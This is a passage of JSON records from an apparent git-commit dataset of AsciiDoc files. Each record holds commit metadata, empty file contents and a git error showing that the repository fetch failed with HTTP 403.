<99da4db57fde39d3df9f1908299d10b8082bf864@cloudera.com>\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/hive_metastore.adoc","new_file":"docs\/hive_metastore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/helifu\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe1a5d57f36c356208c03fbf671bbdc8d6faafd5","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4479555d12025558c2af0252cca935443a82c3e","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8851e43e111eccd4c90609e824617cfc72cfb092","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"guppy4j\/libraries","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/guppy4j\/libraries.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55ab3e86d040d23bcf116c71f3296c45833bfdab","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8da07a49547ecd2bf0ad071f2908072a36a982e","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c0b54c793321f10b461a93893ab7ed3de217108","subject":"Update 
2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c8b2f7acc65db11775f26fc6ab0d6613d83868f","subject":"Update 2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","message":"Update 2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","new_file":"_posts\/2015-11-22-Mostrar-ficheros-Markdown-formateados-en-la-terminal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c47cc7ed16c9e477b13b180493fcdd0bb15d3817","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86f1afe691d74d03545c46edc872a316fd8d703d","subject":"Fixes capitalization","message":"Fixes capitalization","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/04_further_reading.adoc","new_file":"src\/docs\/manual\/04_further_reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eedda7272ce867b20842b7c82061668e5ebe8f9f","subject":"Update 2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc","message":"Update 2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc\n","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc","new_file":"_posts\/2015-04-02-Import-Firefox-password-into-OSX-keychain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85df42a4d7d8f9d07e7035617cb3192e0365b268","subject":"y2b create post $15 DIY Virtual Reality 
Headset!","message":"y2b create post $15 DIY Virtual Reality Headset!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-01-15-DIY-Virtual-Reality-Headset.adoc","new_file":"_posts\/2014-07-01-15-DIY-Virtual-Reality-Headset.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7157ff857883ec12ea7ac70c9d73f491f3ff68e6","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"187060e8f3f7c338ba78a8da4d780e49e6507c25","subject":"#467 Log entries page - documentation (skeleton)","message":"#467 Log entries page - documentation (skeleton)\n","repos":"nemerosa\/ontrack,flesire\/ontrack,flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack,nemerosa\/ontrack,flesire\/ontrack,nemerosa\/ontrack,nemerosa\/ontrack,flesire\/ontrack","old_file":"ontrack-docs\/src\/docs\/asciidoc\/admin-log-entries.adoc","new_file":"ontrack-docs\/src\/docs\/asciidoc\/admin-log-entries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flesire\/ontrack.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac4adb3f5a7e8a7a5fcceeb844764750f34d0fe9","subject":"Added missing asciidoc placeholder. Needed for TravisCI build","message":"Added missing asciidoc placeholder. 
Needed for TravisCI build\n","repos":"engagingspaces\/vertx-dataloader,graphql-java\/java-dataloader","old_file":"src\/main\/asciidoc\/index.adoc","new_file":"src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/engagingspaces\/vertx-dataloader.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81fdc99fb0c2a74936069d45a8d41f273a939de0","subject":"Polish doc","message":"Polish doc\n\nSee gh-3498\n","repos":"michael-simons\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,thomasdarimont\/spring-boot,shangyi0102\/spring-boot,kamilszymanski\/spring-boot,drumonii\/spring-boot,tsachev\/spring-boot,royclarkson\/spring-boot,bijukunjummen\/spring-boot,ptahchiev\/spring-boot,brettwooldridge\/spring-boot,izeye\/spring-boot,sebastiankirsch\/spring-boot,scottfrederick\/spring-boot,brettwooldridge\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,qerub\/spring-boot,mbogoevici\/spring-boot,NetoDevel\/spring-boot,yhj630520\/spring-boot,bjornlindstrom\/spring-boot,drumonii\/spring-boot,habuma\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,jmnarloch\/spring-boot,jmnarloch\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,yangdd1205\/spring-boot,mosoft521\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,mdeinum\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,joshthornhill\/spring-boot,ilayaperumalg\/spring-boot,brettwooldridge\/spring-boot,afroje-reshma\/spring-boot-sample,SaravananParthasarathy\/SPSDemo,philwebb\/spring-boot-concourse,kdvolder\/spring-boot,ihoneymon\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,kamilszymanski\/spring-boot,jxblum\/spring-boot,i007422\/jenkins2-course-spring-boot,rweisleder\/spring-boot,chrylis\/spring-boot,rweisleder\/spring-boot,htynkn\/spring-boot,isopov\/spring-boot,izeye\/spring-boot,sebastiankirsch\/spring-boot,lucassaldanha\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,joshiste\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,candrews\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,vpavic\/spring-boot,minmay\/spring-boot,vakninr\/spring-boot,olivergierke\/spring-boot,DeezCashews\/spring-boot,pvorb\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,mdeinum\/spring-boot,htynkn\/spring-boot,ptahchiev\/spring-boot,RichardCSantana\/spring-boot,qerub\/spring-boot,mbogoevici\/spring-boot,i007422\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,mosoft521\/spring-boot,ihoneymon\/spring-boot,izeye\/spring-boot,lucassaldanha\/spring-boot,qerub\/spring-boot,zhanhb\/spring-boot,lburgazzoli\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,yhj630520\/spring-boot,hello2009chen\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,candrews\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,mbogoevici\/spring-boot,shangyi0102\/spring-boot,ilayaperumalg\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,mbogoevici\/spring-boot,jmnarloch\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,lenicliu\/spring-boot,hello2009chen\/spring-boot,nebhale\/spring-boot,zhan
hb\/spring-boot,sbcoba\/spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,bbrouwer\/spring-boot,javyzheng\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,deki\/spring-boot,jbovet\/spring-boot,michael-simons\/spring-boot,izeye\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,vpavic\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,bjornlindstrom\/spring-boot,hqrt\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,NetoDevel\/spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,jxblum\/spring-boot,yhj630520\/spring-boot,bjornlindstrom\/spring-boot,michael-simons\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,neo4j-contrib\/spring-boot,spring-projects\/spring-boot,wilkinsona\/spring-boot,mosoft521\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,felipeg48\/spring-boot,bijukunjummen\/spring-boot,ihoneymon\/spring-boot,donhuvy\/spring-boot,joshthornhill\/spring-boot,deki\/spring-boot,deki\/spring-boot,lenicliu\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,vakninr\/spring-boot,yangdd1205\/spring-boot,neo4j-contrib\/spring-boot,akmaharshi\/jenkins,bclozel\/spring-boot,NetoDevel\/spring-boot,mbenson\/spring-boot,akmaharshi\/jenkins,nebhale\/spring-boot,felipeg48\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,wilkinsona\/spring-boot,hqrt\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,afroje-reshma\/spring-boot-sample,olivergierke\/spring-boot,royclarkson\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,dreis2211\/spring-boot,pvorb\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,vakninr\/spring-boot,felipeg48\/spring-boot,NetoDevel\/spring-boot,vakninr\/spring-boot,cleverjava\/jenkins2-course-spring-boot,SaravananParthasarathy\/SPSDemo,mbogoevici\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,pvorb\/spring-boot,dreis2211\/spring-boot,spring-projects\/spring-boot,minmay\/spring-boot,nebhale\/spring-boot,scottfrederick\/spring-boot,thomasdarimont\/spring-boot,ilayaperumalg\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,neo4j-contrib\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,deki\/spring-boot,lexandro\/spring-boot,jvz\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,qerub\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,tsachev\/spring-boot,kdvolder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,NetoDevel\/spring-boot,lucassaldanha\/spring-boot,aahlenst\/spring-boot,Nowheresly\/spring-boot,aahlenst\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,kamilszymanski\/spring-boot,herau\/spring-boot,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,olivergierke\/spring-boot,i007422\/jenkins2-course-spring-boot,nebhale\/spring-boot,linead\/spring-boot,linead\/spring-boot,linead\/spring-boot,habuma\/spring-boot,joshiste\/spring-boot,javyzheng\/spring-boot,lenicliu\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,ihoneymon\/spring-boot,jbovet\/spring-boot,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,candrews\/spring-boot
,felipeg48\/spring-boot,jmnarloch\/spring-boot,joshthornhill\/spring-boot,javyzheng\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,dreis2211\/spring-boot,bbrouwer\/spring-boot,bbrouwer\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,bjornlindstrom\/spring-boot,ptahchiev\/spring-boot,scottfrederick\/spring-boot,ollie314\/spring-boot,dreis2211\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot,candrews\/spring-boot,tsachev\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,jvz\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,eddumelendez\/spring-boot,jayarampradhan\/spring-boot,Nowheresly\/spring-boot,sbcoba\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot-concourse,Buzzardo\/spring-boot,hello2009chen\/spring-boot,SaravananParthasarathy\/SPSDemo,chrylis\/spring-boot,shakuzen\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,lburgazzoli\/spring-boot,minmay\/spring-boot,isopov\/spring-boot,joshthornhill\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,lucassaldanha\/spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,sebastiankirsch\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,bclozel\/spring-boot,royclarkson\/spring-boot,neo4j-contrib\/spring-boot,sbcoba\/spring-boot,philwebb\/spring-boot-concourse,shangyi0102\/spring-boot,htynkn\/spring-boot,zhanhb\/spring-boot,linead\/spring-boot,drumonii\/spring-boot,lexandro\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,herau\/spring-boot,DeezCashews\/spring-boot,royclarkson\/spring-boot,kdvolder\/spring-boot,philwebb\/spring-boot,RichardCSantana\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,minmay\/spring-boot,jxblum\/spring-boot,Buzzardo\/spring-boot,vakninr\/spring-boot,bijukunjummen\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,donhuvy\/spring-boot,akmaharshi\/jenkins,Nowheresly\/spring-boot,jvz\/spring-boot,candrews\/spring-boot,joshiste\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,habuma\/spring-boot,lburgazzoli\/spring-boot,vpavic\/spring-boot,xiaoleiPENG\/my-project,philwebb\/spring-boot-concourse,mdeinum\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,javyzheng\/spring-boot,shakuzen\/spring-boot,linead\/spring-boot,htynkn\/spring-boot,afroje-reshma\/spring-boot-sample,olivergierke\/spring-boot,lexandro\/spring-boot,philwebb\/spring-boot,i007422\/jenkins2-course-spring-boot,mevasaroj\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,mosoft521\/spring-boot,thomasdarimont\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,Buzzardo\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lexandro\/spring-boot,tsachev\/spring-boot,minmay\/spring-boot,donhuvy\/spring-boot,isopov\/spring-boot,jbovet\/spring-boot,vpavic\/spring-boot,kamilszymanski\/spring-boot,jmnarloch\/spring-boot,hqrt\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,scottfrederick\/spring-boot,izeye\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,jayarampradhan\/spring-boot,mdeinum\/spring-boot,ollie314\/spring-boot,yhj630520\/spring-boot,mbenson\/spring-boot,isopov\/spring-boot,akmaharshi\/jenkins,sebastiankirsch\/spring-boot,mbenson\/spring-boot,jvz\/spring-boot,chrylis\/spring-boot,bijukunjummen\/spri
ng-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,herau\/spring-boot,yangdd1205\/spring-boot,tiarebalbi\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jbovet\/spring-boot,spring-projects\/spring-boot,RichardCSantana\/spring-boot,lenicliu\/spring-boot,neo4j-contrib\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,vpavic\/spring-boot,sbcoba\/spring-boot,sbcoba\/spring-boot,ptahchiev\/spring-boot,ollie314\/spring-boot,ilayaperumalg\/spring-boot,javyzheng\/spring-boot,pvorb\/spring-boot,lenicliu\/spring-boot,vpavic\/spring-boot,shangyi0102\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f921156d95ac00c8b52c6fcc7784f20f2b345bc6","subject":"Fixed readme md","message":"Fixed readme md\n","repos":"rmuhamedgaliev\/MPI-lab1,rmuhamedgaliev\/MPI-lab1","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab1.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c2aea0504cc5b5b513df48e615ab6572f2ab095","subject":"Ref #2779 Add missing README","message":"Ref #2779 Add missing README\n","repos":"fanf\/cf-clerk,ncharles\/cf-clerk,VinceMacBuche\/cf-clerk","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncharles\/cf-clerk.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"18aa52b72e16963a4417f41e5316a032017aced3","subject":"Added basic ReadMe document","message":"Added basic ReadMe document\n","repos":"aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38d504a6b30e296f0174deafcf2878d87ab9b557","subject":"Update 2015-11-02-Multiples-of-3-and-5.adoc","message":"Update 2015-11-02-Multiples-of-3-and-5.adoc","repos":"Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io,Bulletninja\/bulletninja.github.io","old_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_file":"_posts\/2015-11-02-Multiples-of-3-and-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bulletninja\/bulletninja.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34c224b4a4ea77f9c61a91e7a22342f16f54a4fb","subject":"y2b create post Never Thought I'd See The Day...","message":"y2b create post Never Thought I'd See The 
Day...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-29-Never-Thought-Id-See-The-Day.adoc","new_file":"_posts\/2017-06-29-Never-Thought-Id-See-The-Day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d69da2a393ee13a0f1cd6921b95457f6ca8fca","subject":"Update 2017-06-30-First-work-of-my-data-sience.adoc","message":"Update 2017-06-30-First-work-of-my-data-sience.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_file":"_posts\/2017-06-30-First-work-of-my-data-sience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d3810df548e1edd88b7b8a68703362b590dca6a","subject":"SOLR-12740: migration docs","message":"SOLR-12740: migration docs\n","repos":"apache\/solr,apache\/solr,apache\/solr,apache\/solr,apache\/solr","old_file":"solr\/solr-ref-guide\/src\/migrate-to-policy-rule.adoc","new_file":"solr\/solr-ref-guide\/src\/migrate-to-policy-rule.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/solr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"921e84e305cc26a302cc91bfa98b02342a0a41f3","subject":"Update 2017-09-05-Mini.adoc","message":"Update 2017-09-05-Mini.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-09-05-Mini.adoc","new_file":"_posts\/2017-09-05-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08ef54710c07933297291a7ed824808aff3f0e3c","subject":"add clojurebridge pittsburgh","message":"add clojurebridge pittsburgh\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_pittsburgh.adoc","new_file":"content\/events\/2016\/clojurebridge_pittsburgh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f1af46ca73ad5e5ae87282dc47a15c74c5310908","subject":"Details auto inst","message":"Details auto inst\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff917d83ac8b08ff178908b4332201e2bf3a449c","subject":"Update 
2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96bfd407f71c500c88978426d9ffd99415d15452","subject":"Update 2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","message":"Update 2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","new_file":"_posts\/2015-08-12-Firefox-OS-on-a-High-End-Device.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1226400ff14d92fe45cb85487633a235617bff4","subject":"Update 2015-10-06-OCRWC-and-beyond.adoc","message":"Update 